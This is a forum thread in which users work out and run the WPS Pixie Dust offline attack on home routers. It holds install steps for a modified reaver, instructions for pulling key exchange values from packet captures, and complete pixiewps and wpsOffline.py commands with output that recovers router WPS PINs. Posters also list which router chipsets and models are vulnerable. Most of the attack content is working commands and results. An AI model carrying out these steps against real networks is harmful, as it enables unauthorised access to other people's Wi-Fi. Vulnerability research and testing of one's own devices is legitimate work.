WPS Pixie Dust Attack (Offline WPS Attack)

[SubZero5]

I believe when the PIN is enabled, the pin on the back is active but when it is disabled, that stated PIN is enabled. Any thoughts on this?

[wn722]

copy.
How do you guys get the keys out of pcap file?
just use wireshark?

[soxrok2212]

I believe when the PIN is enabled, the pin on the back is active but when it is disabled, that stated PIN is enabled. Any thoughts on this?

No, they actually both work at the same time. It seems to just be a secret pin...

copy.
How do you guys get the keys out of pcap file?
just use wireshark?

Well everything but the Authkey can be found in wireshark. You can download the modified version of reaver that prints the Authkey, Enrollee Nonce, E-Hash1 and E-Hash2 here. The rest you need to find in a cap file/wireshark. -This was made following wiire's advice from a previous post!


The PKE and PKR (Public Keys) are in the M1 and M2 messages. The M1 contains "Public Key" which is the PKE and the M2 also contains a "Public Key" but this key is different... aka the PKR. (Just right click and copy the values)

If you can give me all this data, that would help A LOT in testing. Print it just like this:

Code:

N1 Enrollee Nonce: 
Authkey: 
PKE: 
PKR: 
E-Hash1: 
E-Hash2:

And optional (but very helpful) information:

Code:

Manufacturer: 
Model Number:
Hardware Version:

All you have to do is:

Code:

cd /path/to/reaver-wps-fork/src
./configure
make
make install

Then you should be good to find data

[mmusket33]

Install matters for reaver download

Go to the src folder

To avoid a file permission error type

chmod 755 configure

then

./configure

make

make install


If you get the following error

checking for pcap_open_live in -

lpcap... no
error: pcap library not found!

Then install these two(2) files:


sudo apt-get install libpcap-dev

sudo apt-get install libsqlite3-dev


then

./configure

make

make install

Program ran fine after this

Great Stuff Soxrox2212!!!

[psicomantis]

Havent had a chance to test the PIN, but here is what I got.

Code:

Arris - DG1670AB2

N1 Enrollee Nonce: 5b:21:6e:79:7f:3d:76:ff:b0:d7:90:69:33:bc:d3:d7
Authkey: 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa:d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c
PKE: d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5:75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48:08:8f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2:c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7:2c:b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:35:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72:c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5:26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:fa:fa:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09:23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d:79:85:12:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d9:f8:68:80:11:55:d7:44:6a
PKR: bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1:d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46:8c:36:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7:79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0:c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:93:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b:33:94:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36:24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:ca:6d:d6:4d:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48:c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4:a4:b0:dd:7e:c1:af:3e:66:ea:bf:16:0a:7a:8a:05:00:01:a4:29:77:a9:d4:81:d4:0e
E-Hash1: 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba:ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38
E-Hash2:b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43:cb:c5:6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:ec

PIN Found- 04847533

[mmusket33]

To Soxrox2212

We see your written reaver program provides the Enrollee nonce

The problem we are having is with the -pke and -pkr keys. When we capture the M1 and M2 message with wireshark the message is too long. Note in the working example published in these threads the length of the -pke string was 384. Our captures are twice that long.

The string length of the -ak -hash1 and -hash2 is 64

A breakdown of M1 and M2 can be found at:

https://briolidz.wordpress.com/2012/...ted-setup-wps/

Enrollee -> Registrar: M1 = Version || N1 || Description || PKE
Enrollee <- Registrar: M2 = Version || N1 || N2 || Description || PKR [ || ConfigData ] || HMAC_AuthKey(M1 || M2*)

• || this symbol means concatenation of parameters to form a message.
• Mn* is message Mn excluding the HMAC-SHA-256 value.
• Version identifies the type of Registration Protocol message.
• N1 is a 128-bit random number (nonce) specified by the Enrollee.
• N2 is a 128-bit random number (nonce) specified by the Registrar.
• Description contains a human-readable description of the sending device (UUID, manufacturer, model number, MAC address, etc.) and device capabilities such as supported algorithms, I/O channels, Registration Protocol role, etc. Description data is also included in 802.11 probe request and probe response messages

Our understanding is we must strip off parts of the M1 and M2 message is this correct?

[soxrok2212]

Havent had a chance to test the PIN, but here is what I got.

Code:

Arris - DG1670AB2

PIN Found- 04847533

This is what I got:

root@Kali:~# pixiewps -a 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa :d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c -e d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5 :75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48:08:8 f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2: c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7:2c :b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:3 5:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72: c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5 :26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:f a:fa:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09: 23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d :79:85:12:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d 9:f8:68:80:11:55:d7:44:6a -r bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1 :d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46:8c:3 6:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7: 79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0 :c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:9 3:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b: 33:94:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36 :24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:c a:6d:d6:4d:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48: c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4 :a4:b0:dd:7e:c1:af:3e:66:ea:bf:16:0a:7a:8a:05:00:0 1:a4:29:77:a9:d4:81:d4:0e -s 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba :ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38 -z b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43:cb:c5 :6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:ec

[%] Progress: 0% 100%[*] Time taken: 0 s
[*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[*] PSK1: d4:eb:0c:2a:38:15:e1:a0:3d:70:db:74:31:eb:53:a3
[*] PSK2: d3:b7:e6:23:f3:1d:22:0a:23:ea:07:bb:7f:76:65:8b

[+] WPS pin: 04840753

[soxrok2212]

To Soxrox2212

Our understanding is we must strip off parts of the M1 and M2 message is this correct?

All you should have to do is open wireshark, navigate to the M1 and M2 messages, then scroll to the public keys and copy the values for those keys... I'd upload a screenshot but the formatting requirements to upload are whack...

[mmusket33]

MTeams are stumbling thru this attack testing on three(3) different computers.

Here is an administrative problem to watch out for.

1. When running the new reaver program provided by soxrox2212 you should see additional text data.

Such as:

Starting Cracking Session....

> N1 Enrollee Nounce: ....

>Auth Key....

If you just see normal reaver output stop reaver and make sure the Network-Manager Icon has both

Enable Networking
Enable Wireless

checked. If that does not work restart the computer.

Some laptops will not provide this output unless these two(2) items are functioning.

[dudux]

Same here Finishing Broadcom PRNG as well

Maybe it is not worth it to implement in several threads, you can bruteforce PSK2 at the same time than PSK1. But being time zero ....
With Broadcom, since we got N1 and the entropy is reduced to 32-7=25 bits. It is still constant time even without threads.

$ time python wpsOffline.py -ak 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa :d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c -pke d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5 :75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48:08:8 f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2: c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7:2c :b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:3 5:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72: c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5 :26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:f a:fa:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09: 23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d :79:85:12:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d 9:f8:68:80:11:55:d7:44:6a -pkr bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1 :d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46:8c:3 6:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7: 79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0 :c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:9 3:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b: 33:94:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36 :24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:c a:6d:d6:4d:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48: c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4 :a4:b0:dd:7e:c1:af:3e:66:ea:bf:16:0a:7a:8a:05:00:0 1:a4:29:77:a9:d4:81:d4:0e -ehash1 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba :ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38 -ehash2 b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43:cb:c5 :6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:ec
PIN FOUND! 04847533

real 0m0.488s
user 0m0.473s
sys 0m0.012s

[wn722]

hey, I'm testing it with TP-Link device on WN722N usb dongle (Atheros)

Code:

Atheros Communications, Inc. AR9271 802.11n

and nothing comes up with wpsOffline script.
can anyone ping me pixiewps.c version?
link on dropbox is dead

p.s.
on some routers PKE comes up as

Code:

00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02

cheers.

my data is

Code:

> AuthKey: 89:90:f7:93:61:95:eb:3b:36:5e:6e:31:b9:e6:cc:76:e4:20:8b:b9:a6:65:00:de:0a:d4:2e:06:70:64:5c:46
[+] Sending M2 message
 > E-Hash1: 9b:21:69:1d:bd:94:16:b5:b6:53:74:76:48:88:69:ed:e4:ae:30:95:82:22:4f:fa:a5:3c:56:19:45:f5:3e:ac
 > E-Hash2: 22:ac:97:70:3d:c0:e6:2d:28:d4:9e:61:f7:92:d2:8b:c8:59:6b:8d:14:c9:cb:15:93:76:b7:4b:19:b2:a3:95

M1 PKE - 82:ea:40:37:43:42:0b:a5:56:8e:48:50:c3:d7:ce:8b:9d:79:c8:0e:c8:01:a7:e0:45:e9:53:35:2b:e1:f9:76:e0:bd:bf:4d:9a:32:be:84:86:88:03:ca:55:61:ef:e9:af:a9:f7:99:b2:98:40:a9:cc:37:15:be:79:19:57:69:02:ac:4b:7c:11:ba:e5:3f:b6:e9:89:e9:c0:6d:0e:ac:50:d1:04:d7:f4:35:04:ec:3c:7d:0d:16:e7:c7:1b:e8:0f:37:90:7b:91:f8:3a:64:22:af:4c:9e:3c:ff:68:7c:c1:b1:b1:00:0c:ba:83:5d:18:28:b5:7b:ca:86:00:97:ff:1f:00:6e:0c:eb:6f:c2:62:85:b5:4a:19:28:b3:67:81:4b:bb:22:74:d0:ac:5e:0a:d1:91:66:cd:1b:28:76:8e:57:a1:16:af:2d:a9:ad:a1:f1:d0:fa:c6:91:5d:be:c0:d3:fb:73:d1:9a:37:47:23:64:fc:88:aa:08:01:c9
M2 PKR - 38:e3:db:ae:9c:ce:35:98:7c:f3:c8:61:ab:4d:8d:08:ef:ba:73:73:a3:bf:18:b8:e4:1b:13:62:6e:e9:9a:d8:d6:7b:fc:d0:ed:7b:55:19:2e:ff:43:e1:3b:9e:1e:bd:c8:60:29:6a:03:a1:c9:cf:47:18:0c:d6:f7:3c:32:86:27:a4:1d:77:d7:0d:0d:48:02:1e:15:81:de:0a:2c:71:3f:fa:d1:da:eb:5e:95:e4:3d:b6:a6:39:d5:ab:f8:d3:8d:d5:91:fa:b0:ac:07:51:67:2b:56:f2:39:2f:12:00:f2:42:21:8a:5f:60:1a:98:e4:f7:42:7c:b4:1c:6d:0a:1f:b3:9c:66:bf:8d:8b:27:57:04:f9:e5:c1:b9:38:4f:f6:6d:65:ec:45:dd:23:b7:72:09:91:38:f9:48:59:6e:0c:8c:df:57:10:0a:18:8b:39:d7:bb:bf:19:22:c5:98:cd:a3:28:62:c8:4f:d2:fa:8d:9f:0a:db:57:bb:26:a5

[wn722]

big ups soxrox and musket for explanations.

[dudux]

big ups soxrox and musket for explanations.

If wpsOffline does not print anything that means PIN NOT FOUND! The router is not taking ES1=ES2 as zero.

the C code I hosted right here: https://bitbucket.org/dudux/wpsoffli...ode/?at=master
But it will give you the same result. Basically the attack is pretty much the same

[soxrok2212]

That version of pixiewps is depreciated. A new version should be released soon by the author wiire.

[wn722]

ok,
is it AP chipset specific? or firmware?

[soxrok2212]

ok,
is it AP chipset specific? or firmware?

Both. If the vendor didn't change the WPS implementation then it is chipset specific, but the AP manufacturer may have changed that. Usually they don't however.

[psicomantis]

I havent been able to test the PIN of my initial capture, but tested thie one today and worked perfectly.

Code:

TG1672G32 

N1 Enrollee Nonce: dd:0a:25:21:2c:55:e8:6b:39:67:cf:2f:6d:0b:d9:6e
AuthKey: 54:19:47:34:ef:1a:79:5f:9a:29:2a:c2:fc:17:4a:74:78:bf:47:71:87:1e:30:27:67:3b:ef:32:58:b7:2b:4c
PKE: 7f:43:2b:4d:4b:ab:2e:63:60:a5:10:20:75:da:c8:b9:8b:1e:4c:ff:c3:c3:29:3a:4f:4e:16:53:dc:76:df:de:d8:6c:4e:35:28:82:c0:5c:f8:79:85:51:3c:a1:06:3c:a3:6a:84:b8:43:e1:28:29:9a:0e:98:38:d2:18:0c:e4:69:ff:d4:1e:c7:a2:8e:82:1a:84:16:e7:d4:a1:c2:f6:2d:9d:5d:3d:bf:82:73:be:26:74:14:69:82:f7:d5:ee:aa:32:77:ba:79:b0:55:88:fa:9a:61:f4:f7:5e:4f:d7:da:76:da:60:b4:cd:93:e0:53:dd:62:09:33:c3:56:48:3f:22:68:b2:46:12:a2:ea:a2:75:e2:be:57:9f:86:fb:5b:bf:03:f7:2d:37:d2:10:c8:26:8d:d2:d5:b1:4a:f6:2f:66:bd:25:2d:1f:ae:90:e2:b9:ee:78:da:5b:86:59:bb:57:67:a1:63:5e:c0:66:a3:5c:82:96:62:f7:7b:ed
PKR: 0c:6d:d1:29:13:e7:b6:4c:ef:56:6e:19:4f:4d:e0:b6:5e:0f:8d:08:4d:32:af:bd:7c:75:ae:5b:15:a6:53:d7:4a:27:53:44:54:8f:18:5a:56:67:ff:a5:27:a1:a4:95:31:b5:57:af:d2:53:e2:8d:c4:b5:c2:eb:0f:b7:0c:43:82:10:aa:2f:b4:42:e5:b1:ed:a7:a1:f0:d0:50:1a:e4:69:ca:f7:a9:da:b9:ff:86:6f:68:59:61:e1:37:19:de:50:51:bd:dd:60:ef:85:a8:e2:90:64:03:24:a6:c2:9d:e4:6d:09:92:11:52:30:4c:9e:b4:2e:a8:fe:be:f8:88:7c:f4:ae:eb:57:40:b7:8f:8b:5d:f7:62:5a:bf:80:21:46:e9:83:28:95:f1:58:d9:26:f5:c6:2a:bf:83:ab:a5:eb:ac:ee:e0:96:5e:06:9f:0e:ca:06:32:2a:72:57:95:b6:dd:67:d4:f7:56:98:9b:fa:ba:51:88:e8:a7:08:34
E-Hash1: 36:7c:e3:7e:cc:75:74:f6:88:1a:6b:7d:06:15:ef:d8:2c:eb:d9:d6:07:b8:2d:68:4b:ec:25:8f:3e:14:15:07
E-Hash2: 55:c7:18:2b:c6:ed:87:de:95:d2:98:19:2e:69:f9:0e:65:a9:d0:02:5e:ed:9c:24:d4:ce:2a:63:14:61:46:56

[+] Pin cracked in 15 seconds
[+] WPS PIN: '31335492'

[wn722]

i see.
one more quetion - these keys (ak, PKE,PKR, Ehash1/2) do they need to be part of same conversation?
OR any key is good?

[soxrok2212]

They have to be from the same session. Aka pin 77755533's data will differ from 98949682. The data is not interchangable.

[wn722]

edited **************8

[soxrok2212]

Well you can compare the enrollee nonce that reaver prints with the enrollee nonce in wireshark... then you can assume the rest of the data is matching and you are looking at the right session. Don't compare PKE or PKR values as some APs reuse DH Keys!

[wn722]

nah, i was just being thick - all it takes is to run reaver with one pin attempt.
I'm assuming you get all the data from one try though

[soxrok2212]

Yes you are correct

[wn722]

anyone tried TP-Link devices?
I got some 740,841 and it's zip.

[soxrok2212]

There have been a few vulnerable ones. Are you saying you have a zip file that you want tested?

[mmusket33]

More reaver/bully reinstall problems with pixiedust mod

Musket Team labs did a fresh HD install of kali-linux then apt-get upgrade/apt-get install then loaded the pixie dust moded bully and reaver. First note our comments in threads above for reaver install concerning libpcap-dev and libsqlite3-dev.

In addition:

When reinstalling reaver with the pixie-dust mode you may find in wireshark that the M2 public key is always ......000000002 for ALL targets.

You will also find that when reinstalling bully that you get an openssl error message and a failed reinstall.


To correct this get an internet connection then:

apt-get install libssl-dev


Run wireshark and reaver and the public key for M2 will be seen.

Install bully and the install process proceeds with no errors.

Musket Teams Labs

[wn722]

There have been a few vulnerable ones. Are you saying you have a zip file that you want tested?

no i meant i'm getting nothing when running it against the script.
I didn't see any tp-link in the list of supported devices.
c

[wiire]

When reinstalling reaver with the pixie-dust mode you may find in wireshark that the M2 public key is always ......000000002 for ALL targets.

You get PKR: 00:00 [...] 00:02 when using '-S' ('--dh-small') option.

@wn722
The very first AP I tested was a TP-LINK (see my first 2 posts). But I haven't written down the model.

[mmusket33]

To Wire - Yes we ran a test and you are correct. This then leads to to the obvious question.

1. Will a pixie dust attack work with DH small data?

2. If it does then we can just run a DH small attack. This would mean that the pkr variable would always be constant.


MTeams

[wn722]

@wiire
hm, can you look it up?
also did you use wpsOffline or pixiewps script?

[wn722]

1. Will a pixie dust attack work with DH small data?

2. If it does then we can just run a DH small attack. This would mean that the pkr variable would always be constant.

I was getting 00:00:xx:02 PK every now and then running with bare reaver. with -N -L -S option it was fixed.

[soxrok2212]

I will try to see if small DH Keys work later today. I don't expect it to however, but it is certain worth a try.

[wiire]

I will try to see if small DH Keys work later today. I don't expect it to however, but it is certain worth a try.

Of course it works.

I added the -S option to pixiewps so we don't need to print PKR on screen or get it on Wireshark.

@wn722
I only use my program, pixiewps.

[wn722]

@wn722
I only use my program, pixiewps.

can you share a link?
cheers.

[soxrok2212]

can you share a link?
cheers.

It will be out along with a video demo sometime this week.

[wiire]

Pixiewps is out!

Link to the pixiewps thread.

[FurqanHanif]

Modified Reaver Not Showing Publick Key (pke)..

Trying pin 00005678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
> N1 Enrollee Nonce: f8:49:5a:df:00:b7:0b:9b:6c:cc:64:2d:11:c8:89:52
[+] Received M1 message
> AuthKey: ce:cc:a5:98:fb:a8:5c:c7:7b:5f:1a:a2:be:ca:1b:b5:40 :27:72:a3:3e:d7:4b:db:dd:78:bf:3c:02:bc:51:aa
[+] Sending M2 message
> E-Hash1: 75:26:1a:d3:bd:73:ed:8e:3e:15:3b:aa:33:b0:dd:92:03 :0b:93:7e:93:cb:c0:ec:34:64:9b:06:ea:61:71:8b
> E-Hash2: 01:d6:8f:f1:9d:3d:da:52:3c:45:42:2f:5f:55:f2:3a:0c :00:3f:f2:ae:bf:9c:7b:12:6e:ee:56:89:2c:52:d3
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 2
[+] Pin count advanced: 2. Max pin attempts: 11000
[+] Trying pin 01235678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
> N1 Enrollee Nonce: 27:2b:38:0d:fc:3a:17:06:d4:7d:d3:09:4d:86:87:95
[+] Received M1 message
> AuthKey: 51:29:84:ca:f5:96:d2:b8:f3:90:9f:81:1f:3e:48:57:2e :5c:b1:81:13:83:84:66:86:82:d3:5b:1b:9b:75:ab
[+] Sending M2 message
> E-Hash1: 87:0f:45:30:2f:61:61:53:88:cb:b6:23:e9:ea:d5:22:9a :c4:c3:62:ff:2a:02:b7:99:a1:9d:99:d9:45:f7:82
> E-Hash2: f9:51:2a:a4:3f:79:e7:67:28:f7:37:f4:31:a7:17:ca:75 :e8:b8:3b:31:25:4a:13:60:c5:82:f5:ef:a7:cc:8f
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 3

[wn722]

cool.
does it matter if you use dec format or just plain string?

af:75:f6:2c:eb:08:c3:f9:71:72:22:92:04:6f:cd:0c
vs
af75f62ceb08c3f971722292046fcd0c

[soxrok2212]

I'm pretty sure both work.

[wn722]

If anyone has luck on devices can you post your HW info?
didn't work for
TP link 841N v8 - AR9341
TP link 841N v9 - QCA9533-AL3A
TP link 720N v1 - AR9331

[wn722]

hey any way to get the AK from wireshark only?

[soxrok2212]

Those are all Atheros not supported that's why it didn't work

[zimmaro]

many ,many thanks for this thread && hard work && scripts guys!!!!! (soxrok2212,wiire,kcdtv,rep.....thanks-so-much.)
really appreciate!!!!
one-test...seem correct
http://www.imagestime.com/show.php/1...pixie.PNG.html

[wiire]

many ,many thanks for this thread && hard work && scripts guys!!!!! (soxrok2212,wiire,kcdtv,rep.....thanks-so-much.)
really appreciate!!!!
one-test...seem correct
http://www.imagestime.com/show.php/1...pixie.PNG.html

You could've just converted the last 6 bytes of the MAC to decimal to get the PIN. But whatever...

10/10 for the drawing!

@wn722
No.

[wn722]

Those are all Atheros not supported that's why it didn't work

that's a bummer...

[Quest]

Many thanks soxrok2212 and all who participated! Epic thread

[soxrok2212]

Many thanks soxrok2212 and all who participated! Epic thread

Don't forget Wiire... the actual creator of the tool!

[psicomantis]

Quick question. Would it matter if I always use the enrollee nonce? or should I only use it in certain cases?

[soxrok2212]

Nah it shouldn't matter... Just be sure to always use it when you attack broadcom.

[aanarchyy]

[P] WPS Manufacturer: ENCORE Technologies, Inc.
[P] WPS Model Number: ENHWI-3GN3
Ralink chipset: RT3050

Confirmed Vulnerable.

https://wikidevi.com/wiki/Encore_ENHWI-3GN3